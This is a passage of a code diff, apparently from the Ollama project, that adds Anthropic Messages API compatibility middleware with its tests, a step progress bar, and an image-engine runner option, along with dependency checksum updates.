golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
|
||||
golang.org/x/text v0.30.0 h1:yznKA/E9zq54KzlzBEAWn1NXSQ8DIp/NYMy88xJjl4k=
|
||||
golang.org/x/text v0.30.0/go.mod h1:yDdHFIX9t+tORqspjENWgzaCVXgk0yYnYuSZ8UzzBVM=
|
||||
golang.org/x/text v0.32.0 h1:ZD01bjUt1FQ9WJ0ClOL5vxgxOI/sVCNgX1YtKwcY0mU=
|
||||
golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY=
|
||||
golang.org/x/tools v0.0.0-20180525024113-a5b4c53f6e8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
|
||||
@@ -330,8 +330,8 @@ golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapK
|
||||
golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
|
||||
golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
|
||||
golang.org/x/tools v0.1.4/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk=
|
||||
golang.org/x/tools v0.38.0 h1:Hx2Xv8hISq8Lm16jvBZ2VQf+RLmbd7wVUsALibYI/IQ=
|
||||
golang.org/x/tools v0.38.0/go.mod h1:yEsQ/d/YK8cjh0L6rZlY8tgtlKiBNTL14pGDJPJpYQs=
|
||||
golang.org/x/tools v0.40.0 h1:yLkxfA+Qnul4cs9QA3KnlFu0lVmd8JJfoq+E41uSutA=
|
||||
golang.org/x/tools v0.40.0/go.mod h1:Ik/tzLRlbscWpqqMRjyWYDisX8bG13FrdXp3o4Sr9lc=
|
||||
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
|
||||
149
middleware/anthropic.go
Normal file
149
middleware/anthropic.go
Normal file
@@ -0,0 +1,149 @@
|
||||
package middleware
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net/http"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
|
||||
"github.com/ollama/ollama/anthropic"
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// AnthropicWriter wraps the response writer to transform Ollama responses to Anthropic format
|
||||
type AnthropicWriter struct {
|
||||
BaseWriter
|
||||
stream bool
|
||||
id string
|
||||
model string
|
||||
converter *anthropic.StreamConverter
|
||||
}
|
||||
|
||||
func (w *AnthropicWriter) writeError(data []byte) (int, error) {
|
||||
var errData struct {
|
||||
Error string `json:"error"`
|
||||
}
|
||||
if err := json.Unmarshal(data, &errData); err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
w.ResponseWriter.Header().Set("Content-Type", "application/json")
|
||||
err := json.NewEncoder(w.ResponseWriter).Encode(anthropic.NewError(w.ResponseWriter.Status(), errData.Error))
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
return len(data), nil
|
||||
}
|
||||
|
||||
func (w *AnthropicWriter) writeEvent(eventType string, data any) error {
|
||||
d, err := json.Marshal(data)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
_, err = w.ResponseWriter.Write([]byte(fmt.Sprintf("event: %s\ndata: %s\n\n", eventType, d)))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if f, ok := w.ResponseWriter.(http.Flusher); ok {
|
||||
f.Flush()
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (w *AnthropicWriter) writeResponse(data []byte) (int, error) {
|
||||
var chatResponse api.ChatResponse
|
||||
err := json.Unmarshal(data, &chatResponse)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
if w.stream {
|
||||
w.ResponseWriter.Header().Set("Content-Type", "text/event-stream")
|
||||
|
||||
events := w.converter.Process(chatResponse)
|
||||
for _, event := range events {
|
||||
if err := w.writeEvent(event.Event, event.Data); err != nil {
|
||||
return 0, err
|
||||
}
|
||||
}
|
||||
return len(data), nil
|
||||
}
|
||||
|
||||
w.ResponseWriter.Header().Set("Content-Type", "application/json")
|
||||
response := anthropic.ToMessagesResponse(w.id, chatResponse)
|
||||
return len(data), json.NewEncoder(w.ResponseWriter).Encode(response)
|
||||
}
|
||||
|
||||
func (w *AnthropicWriter) Write(data []byte) (int, error) {
|
||||
code := w.ResponseWriter.Status()
|
||||
if code != http.StatusOK {
|
||||
return w.writeError(data)
|
||||
}
|
||||
|
||||
return w.writeResponse(data)
|
||||
}
|
||||
|
||||
// AnthropicMessagesMiddleware handles Anthropic Messages API requests
|
||||
func AnthropicMessagesMiddleware() gin.HandlerFunc {
|
||||
return func(c *gin.Context) {
|
||||
var req anthropic.MessagesRequest
|
||||
err := c.ShouldBindJSON(&req)
|
||||
if err != nil {
|
||||
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
|
||||
return
|
||||
}
|
||||
|
||||
if req.Model == "" {
|
||||
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "model is required"))
|
||||
return
|
||||
}
|
||||
|
||||
if req.MaxTokens <= 0 {
|
||||
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "max_tokens is required and must be positive"))
|
||||
return
|
||||
}
|
||||
|
||||
if len(req.Messages) == 0 {
|
||||
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "messages is required"))
|
||||
return
|
||||
}
|
||||
|
||||
chatReq, err := anthropic.FromMessagesRequest(req)
|
||||
if err != nil {
|
||||
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
|
||||
return
|
||||
}
|
||||
|
||||
var b bytes.Buffer
|
||||
if err := json.NewEncoder(&b).Encode(chatReq); err != nil {
|
||||
c.AbortWithStatusJSON(http.StatusInternalServerError, anthropic.NewError(http.StatusInternalServerError, err.Error()))
|
||||
return
|
||||
}
|
||||
|
||||
c.Request.Body = io.NopCloser(&b)
|
||||
|
||||
messageID := anthropic.GenerateMessageID()
|
||||
|
||||
w := &AnthropicWriter{
|
||||
BaseWriter: BaseWriter{ResponseWriter: c.Writer},
|
||||
stream: req.Stream,
|
||||
id: messageID,
|
||||
model: req.Model,
|
||||
converter: anthropic.NewStreamConverter(messageID, req.Model),
|
||||
}
|
||||
|
||||
if req.Stream {
|
||||
c.Writer.Header().Set("Content-Type", "text/event-stream")
|
||||
c.Writer.Header().Set("Cache-Control", "no-cache")
|
||||
c.Writer.Header().Set("Connection", "keep-alive")
|
||||
}
|
||||
|
||||
c.Writer = w
|
||||
|
||||
c.Next()
|
||||
}
|
||||
}
|
||||
584
middleware/anthropic_test.go
Normal file
584
middleware/anthropic_test.go
Normal file
@@ -0,0 +1,584 @@
|
||||
package middleware
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"github.com/google/go-cmp/cmp"
|
||||
"github.com/google/go-cmp/cmp/cmpopts"
|
||||
|
||||
"github.com/ollama/ollama/anthropic"
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
func captureAnthropicRequest(capturedRequest any) gin.HandlerFunc {
|
||||
return func(c *gin.Context) {
|
||||
bodyBytes, _ := io.ReadAll(c.Request.Body)
|
||||
c.Request.Body = io.NopCloser(bytes.NewReader(bodyBytes))
|
||||
_ = json.Unmarshal(bodyBytes, capturedRequest)
|
||||
c.Next()
|
||||
}
|
||||
}
|
||||
|
||||
// testProps creates ToolPropertiesMap from a map (convenience function for tests)
|
||||
func testProps(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
func TestAnthropicMessagesMiddleware(t *testing.T) {
|
||||
type testCase struct {
|
||||
name string
|
||||
body string
|
||||
req api.ChatRequest
|
||||
err anthropic.ErrorResponse
|
||||
}
|
||||
|
||||
var capturedRequest *api.ChatRequest
|
||||
stream := true
|
||||
|
||||
testCases := []testCase{
|
||||
{
|
||||
name: "basic message",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
Options: map[string]any{"num_predict": 1024},
|
||||
Stream: &False,
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "with system prompt",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"system": "You are helpful.",
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "system", Content: "You are helpful."},
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
Options: map[string]any{"num_predict": 1024},
|
||||
Stream: &False,
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "with options",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 2048,
|
||||
"temperature": 0.7,
|
||||
"top_p": 0.9,
|
||||
"top_k": 40,
|
||||
"stop_sequences": ["\n", "END"],
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
Options: map[string]any{
|
||||
"num_predict": 2048,
|
||||
"temperature": 0.7,
|
||||
"top_p": 0.9,
|
||||
"top_k": 40,
|
||||
"stop": []string{"\n", "END"},
|
||||
},
|
||||
Stream: &False,
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "streaming",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"stream": true,
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
Options: map[string]any{"num_predict": 1024},
|
||||
Stream: &stream,
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "with tools",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"messages": [
|
||||
{"role": "user", "content": "What's the weather?"}
|
||||
],
|
||||
"tools": [{
|
||||
"name": "get_weather",
|
||||
"description": "Get current weather",
|
||||
"input_schema": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"location": {"type": "string"}
|
||||
},
|
||||
"required": ["location"]
|
||||
}
|
||||
}]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "user", Content: "What's the weather?"},
|
||||
},
|
||||
Tools: []api.Tool{
|
||||
{
|
||||
Type: "function",
|
||||
Function: api.ToolFunction{
|
||||
Name: "get_weather",
|
||||
Description: "Get current weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: testProps(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
Options: map[string]any{"num_predict": 1024},
|
||||
Stream: &False,
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "with tool result",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"messages": [
|
||||
{"role": "user", "content": "What's the weather?"},
|
||||
{"role": "assistant", "content": [
|
||||
{"type": "tool_use", "id": "call_123", "name": "get_weather", "input": {"location": "Paris"}}
|
||||
]},
|
||||
{"role": "user", "content": [
|
||||
{"type": "tool_result", "tool_use_id": "call_123", "content": "Sunny, 22°C"}
|
||||
]}
|
||||
]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "user", Content: "What's the weather?"},
|
||||
{
|
||||
Role: "assistant",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{
|
||||
ID: "call_123",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: testArgs(map[string]any{"location": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
{Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call_123"},
|
||||
},
|
||||
Options: map[string]any{"num_predict": 1024},
|
||||
Stream: &False,
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "with thinking enabled",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"thinking": {"type": "enabled", "budget_tokens": 1000},
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
req: api.ChatRequest{
|
||||
Model: "test-model",
|
||||
Messages: []api.Message{
|
||||
{Role: "user", Content: "Hello"},
|
||||
},
|
||||
Options: map[string]any{"num_predict": 1024},
|
||||
Stream: &False,
|
||||
Think: &api.ThinkValue{Value: true},
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "missing model error",
|
||||
body: `{
|
||||
"max_tokens": 1024,
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
err: anthropic.ErrorResponse{
|
||||
Type: "error",
|
||||
Error: anthropic.Error{
|
||||
Type: "invalid_request_error",
|
||||
Message: "model is required",
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "missing max_tokens error",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"messages": [
|
||||
{"role": "user", "content": "Hello"}
|
||||
]
|
||||
}`,
|
||||
err: anthropic.ErrorResponse{
|
||||
Type: "error",
|
||||
Error: anthropic.Error{
|
||||
Type: "invalid_request_error",
|
||||
Message: "max_tokens is required and must be positive",
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "missing messages error",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024
|
||||
}`,
|
||||
err: anthropic.ErrorResponse{
|
||||
Type: "error",
|
||||
Error: anthropic.Error{
|
||||
Type: "invalid_request_error",
|
||||
Message: "messages is required",
|
||||
},
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "tool_use missing id error",
|
||||
body: `{
|
||||
"model": "test-model",
|
||||
"max_tokens": 1024,
|
||||
"messages": [
|
||||
{"role": "assistant", "content": [
|
||||
{"type": "tool_use", "name": "test"}
|
||||
]}
|
||||
]
|
||||
}`,
|
||||
err: anthropic.ErrorResponse{
|
||||
Type: "error",
|
||||
Error: anthropic.Error{
|
||||
Type: "invalid_request_error",
|
||||
Message: "tool_use block missing required 'id' field",
|
||||
},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
endpoint := func(c *gin.Context) {
|
||||
c.Status(http.StatusOK)
|
||||
}
|
||||
|
||||
gin.SetMode(gin.TestMode)
|
||||
router := gin.New()
|
||||
router.Use(AnthropicMessagesMiddleware(), captureAnthropicRequest(&capturedRequest))
|
||||
router.Handle(http.MethodPost, "/v1/messages", endpoint)
|
||||
|
||||
for _, tc := range testCases {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(tc.body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
defer func() { capturedRequest = nil }()
|
||||
|
||||
resp := httptest.NewRecorder()
|
||||
router.ServeHTTP(resp, req)
|
||||
|
||||
if tc.err.Type != "" {
|
||||
// Expect error
|
||||
if resp.Code == http.StatusOK {
|
||||
t.Fatalf("expected error response, got 200 OK")
|
||||
}
|
||||
var errResp anthropic.ErrorResponse
|
||||
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
|
||||
t.Fatalf("failed to unmarshal error: %v", err)
|
||||
}
|
||||
if errResp.Type != tc.err.Type {
|
||||
t.Errorf("expected error type %q, got %q", tc.err.Type, errResp.Type)
|
||||
}
|
||||
if errResp.Error.Type != tc.err.Error.Type {
|
||||
t.Errorf("expected error.type %q, got %q", tc.err.Error.Type, errResp.Error.Type)
|
||||
}
|
||||
if errResp.Error.Message != tc.err.Error.Message {
|
||||
t.Errorf("expected error.message %q, got %q", tc.err.Error.Message, errResp.Error.Message)
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if resp.Code != http.StatusOK {
|
||||
t.Fatalf("unexpected status code: %d, body: %s", resp.Code, resp.Body.String())
|
||||
}
|
||||
|
||||
if capturedRequest == nil {
|
||||
t.Fatal("request was not captured")
|
||||
}
|
||||
|
||||
// Compare relevant fields
|
||||
if capturedRequest.Model != tc.req.Model {
|
||||
t.Errorf("model mismatch: got %q, want %q", capturedRequest.Model, tc.req.Model)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(tc.req.Messages, capturedRequest.Messages,
|
||||
cmpopts.IgnoreUnexported(api.ToolCallFunctionArguments{}, api.ToolPropertiesMap{})); diff != "" {
|
||||
t.Errorf("messages mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
|
||||
if tc.req.Stream != nil && capturedRequest.Stream != nil {
|
||||
if *tc.req.Stream != *capturedRequest.Stream {
|
||||
t.Errorf("stream mismatch: got %v, want %v", *capturedRequest.Stream, *tc.req.Stream)
|
||||
}
|
||||
}
|
||||
|
||||
if tc.req.Think != nil {
|
||||
if capturedRequest.Think == nil {
|
||||
t.Error("expected Think to be set")
|
||||
} else if capturedRequest.Think.Value != tc.req.Think.Value {
|
||||
t.Errorf("Think mismatch: got %v, want %v", capturedRequest.Think.Value, tc.req.Think.Value)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestAnthropicMessagesMiddleware_Headers(t *testing.T) {
|
||||
gin.SetMode(gin.TestMode)
|
||||
|
||||
t.Run("streaming sets correct headers", func(t *testing.T) {
|
||||
router := gin.New()
|
||||
router.Use(AnthropicMessagesMiddleware())
|
||||
router.POST("/v1/messages", func(c *gin.Context) {
|
||||
// Check headers were set
|
||||
if c.Writer.Header().Get("Content-Type") != "text/event-stream" {
|
||||
t.Errorf("expected Content-Type text/event-stream, got %q", c.Writer.Header().Get("Content-Type"))
|
||||
}
|
||||
if c.Writer.Header().Get("Cache-Control") != "no-cache" {
|
||||
t.Errorf("expected Cache-Control no-cache, got %q", c.Writer.Header().Get("Cache-Control"))
|
||||
}
|
||||
c.Status(http.StatusOK)
|
||||
})
|
||||
|
||||
body := `{"model": "test", "max_tokens": 100, "stream": true, "messages": [{"role": "user", "content": "Hi"}]}`
|
||||
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp := httptest.NewRecorder()
|
||||
router.ServeHTTP(resp, req)
|
||||
})
|
||||
}
|
||||
|
||||
func TestAnthropicMessagesMiddleware_InvalidJSON(t *testing.T) {
|
||||
gin.SetMode(gin.TestMode)
|
||||
router := gin.New()
|
||||
router.Use(AnthropicMessagesMiddleware())
|
||||
router.POST("/v1/messages", func(c *gin.Context) {
|
||||
c.Status(http.StatusOK)
|
||||
})
|
||||
|
||||
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(`{invalid json`))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp := httptest.NewRecorder()
|
||||
router.ServeHTTP(resp, req)
|
||||
|
||||
if resp.Code != http.StatusBadRequest {
|
||||
t.Errorf("expected status 400, got %d", resp.Code)
|
||||
}
|
||||
|
||||
var errResp anthropic.ErrorResponse
|
||||
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
|
||||
t.Fatalf("failed to unmarshal error: %v", err)
|
||||
}
|
||||
|
||||
if errResp.Type != "error" {
|
||||
t.Errorf("expected type 'error', got %q", errResp.Type)
|
||||
}
|
||||
if errResp.Error.Type != "invalid_request_error" {
|
||||
t.Errorf("expected error type 'invalid_request_error', got %q", errResp.Error.Type)
|
||||
}
|
||||
}
|
||||
|
||||
func TestAnthropicWriter_NonStreaming(t *testing.T) {
|
||||
gin.SetMode(gin.TestMode)
|
||||
|
||||
router := gin.New()
|
||||
router.Use(AnthropicMessagesMiddleware())
|
||||
router.POST("/v1/messages", func(c *gin.Context) {
|
||||
// Simulate Ollama response
|
||||
resp := api.ChatResponse{
|
||||
Model: "test-model",
|
||||
Message: api.Message{
|
||||
Role: "assistant",
|
||||
Content: "Hello there!",
|
||||
},
|
||||
Done: true,
|
||||
DoneReason: "stop",
|
||||
Metrics: api.Metrics{
|
||||
PromptEvalCount: 10,
|
||||
EvalCount: 5,
|
||||
},
|
||||
}
|
||||
data, _ := json.Marshal(resp)
|
||||
c.Writer.WriteHeader(http.StatusOK)
|
||||
_, _ = c.Writer.Write(data)
|
||||
})
|
||||
|
||||
body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
|
||||
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp := httptest.NewRecorder()
|
||||
router.ServeHTTP(resp, req)
|
||||
|
||||
if resp.Code != http.StatusOK {
|
||||
t.Fatalf("expected status 200, got %d", resp.Code)
|
||||
}
|
||||
|
||||
var result anthropic.MessagesResponse
|
||||
if err := json.Unmarshal(resp.Body.Bytes(), &result); err != nil {
|
||||
t.Fatalf("failed to unmarshal response: %v", err)
|
||||
}
|
||||
|
||||
if result.Type != "message" {
|
||||
t.Errorf("expected type 'message', got %q", result.Type)
|
||||
}
|
||||
if result.Role != "assistant" {
|
||||
t.Errorf("expected role 'assistant', got %q", result.Role)
|
||||
}
|
||||
if len(result.Content) != 1 {
|
||||
t.Fatalf("expected 1 content block, got %d", len(result.Content))
|
||||
}
|
||||
if result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
|
||||
t.Errorf("expected text 'Hello there!', got %v", result.Content[0].Text)
|
||||
}
|
||||
if result.StopReason != "end_turn" {
|
||||
t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
|
||||
}
|
||||
if result.Usage.InputTokens != 10 {
|
||||
t.Errorf("expected input_tokens 10, got %d", result.Usage.InputTokens)
|
||||
}
|
||||
if result.Usage.OutputTokens != 5 {
|
||||
t.Errorf("expected output_tokens 5, got %d", result.Usage.OutputTokens)
|
||||
}
|
||||
}
|
||||
|
||||
// TestAnthropicWriter_ErrorFromRoutes tests error handling when routes.go sends
|
||||
// gin.H{"error": "message"} without a StatusCode field (which is the common case)
|
||||
func TestAnthropicWriter_ErrorFromRoutes(t *testing.T) {
|
||||
gin.SetMode(gin.TestMode)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
statusCode int
|
||||
errorPayload any
|
||||
wantErrorType string
|
||||
wantMessage string
|
||||
}{
|
||||
// routes.go sends errors without StatusCode in JSON, so we must use HTTP status
|
||||
{
|
||||
name: "404 with gin.H error (model not found)",
|
||||
statusCode: http.StatusNotFound,
|
||||
errorPayload: gin.H{"error": "model 'nonexistent' not found"},
|
||||
wantErrorType: "not_found_error",
|
||||
wantMessage: "model 'nonexistent' not found",
|
||||
},
|
||||
{
|
||||
name: "400 with gin.H error (bad request)",
|
||||
statusCode: http.StatusBadRequest,
|
||||
errorPayload: gin.H{"error": "model is required"},
|
||||
wantErrorType: "invalid_request_error",
|
||||
wantMessage: "model is required",
|
||||
},
|
||||
{
|
||||
name: "500 with gin.H error (internal error)",
|
||||
statusCode: http.StatusInternalServerError,
|
||||
errorPayload: gin.H{"error": "something went wrong"},
|
||||
wantErrorType: "api_error",
|
||||
wantMessage: "something went wrong",
|
||||
},
|
||||
{
|
||||
name: "404 with api.StatusError",
|
||||
statusCode: http.StatusNotFound,
|
||||
errorPayload: api.StatusError{
|
||||
StatusCode: http.StatusNotFound,
|
||||
ErrorMessage: "model not found via StatusError",
|
||||
},
|
||||
wantErrorType: "not_found_error",
|
||||
wantMessage: "model not found via StatusError",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
router := gin.New()
|
||||
router.Use(AnthropicMessagesMiddleware())
|
||||
router.POST("/v1/messages", func(c *gin.Context) {
|
||||
// Simulate what routes.go does - set status and write error JSON
|
||||
data, _ := json.Marshal(tt.errorPayload)
|
||||
c.Writer.WriteHeader(tt.statusCode)
|
||||
_, _ = c.Writer.Write(data)
|
||||
})
|
||||
|
||||
body := `{"model": "test-model", "max_tokens": 100, "messages": [{"role": "user", "content": "Hi"}]}`
|
||||
req, _ := http.NewRequest(http.MethodPost, "/v1/messages", strings.NewReader(body))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp := httptest.NewRecorder()
|
||||
router.ServeHTTP(resp, req)
|
||||
|
||||
if resp.Code != tt.statusCode {
|
||||
t.Errorf("expected status %d, got %d", tt.statusCode, resp.Code)
|
||||
}
|
||||
|
||||
var errResp anthropic.ErrorResponse
|
||||
if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
|
||||
t.Fatalf("failed to unmarshal error response: %v\nbody: %s", err, resp.Body.String())
|
||||
}
|
||||
|
||||
if errResp.Type != "error" {
|
||||
t.Errorf("expected type 'error', got %q", errResp.Type)
|
||||
}
|
||||
if errResp.Error.Type != tt.wantErrorType {
|
||||
t.Errorf("expected error type %q, got %q", tt.wantErrorType, errResp.Error.Type)
|
||||
}
|
||||
if errResp.Error.Message != tt.wantMessage {
|
||||
t.Errorf("expected message %q, got %q", tt.wantMessage, errResp.Error.Message)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
33
progress/stepbar.go
Normal file
33
progress/stepbar.go
Normal file
@@ -0,0 +1,33 @@
|
||||
package progress
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// StepBar displays step-based progress (e.g., for image generation steps).
|
||||
type StepBar struct {
|
||||
message string
|
||||
current int
|
||||
total int
|
||||
}
|
||||
|
||||
func NewStepBar(message string, total int) *StepBar {
|
||||
return &StepBar{message: message, total: total}
|
||||
}
|
||||
|
||||
func (s *StepBar) Set(current int) {
|
||||
s.current = current
|
||||
}
|
||||
|
||||
func (s *StepBar) String() string {
|
||||
percent := float64(s.current) / float64(s.total) * 100
|
||||
barWidth := s.total
|
||||
empty := barWidth - s.current
|
||||
|
||||
// "Generating 0% ▕ ▏ 0/9"
|
||||
return fmt.Sprintf("%s %3.0f%% ▕%s%s▏ %d/%d",
|
||||
s.message, percent,
|
||||
strings.Repeat("█", s.current), strings.Repeat(" ", empty),
|
||||
s.current, s.total)
|
||||
}
|
||||
@@ -3,6 +3,7 @@ package runner
|
||||
import (
|
||||
"github.com/ollama/ollama/runner/llamarunner"
|
||||
"github.com/ollama/ollama/runner/ollamarunner"
|
||||
imagerunner "github.com/ollama/ollama/x/imagegen/runner"
|
||||
)
|
||||
|
||||
func Execute(args []string) error {
|
||||
@@ -11,12 +12,19 @@ func Execute(args []string) error {
|
||||
}
|
||||
|
||||
var newRunner bool
|
||||
if args[0] == "--ollama-engine" {
|
||||
var imageRunner bool
|
||||
if len(args) > 0 && args[0] == "--ollama-engine" {
|
||||
args = args[1:]
|
||||
newRunner = true
|
||||
}
|
||||
if len(args) > 0 && args[0] == "--image-engine" {
|
||||
args = args[1:]
|
||||
imageRunner = true
|
||||
}
|
||||
|
||||
if newRunner {
|
||||
if imageRunner {
|
||||
return imagerunner.Execute(args)
|
||||
} else if newRunner {
|
||||
return ollamarunner.Execute(args)
|
||||
} else {
|
||||
return llamarunner.Execute(args)
|
||||
|
||||
183
server/images.go
183
server/images.go
@@ -30,6 +30,7 @@ import (
|
||||
"github.com/ollama/ollama/thinking"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
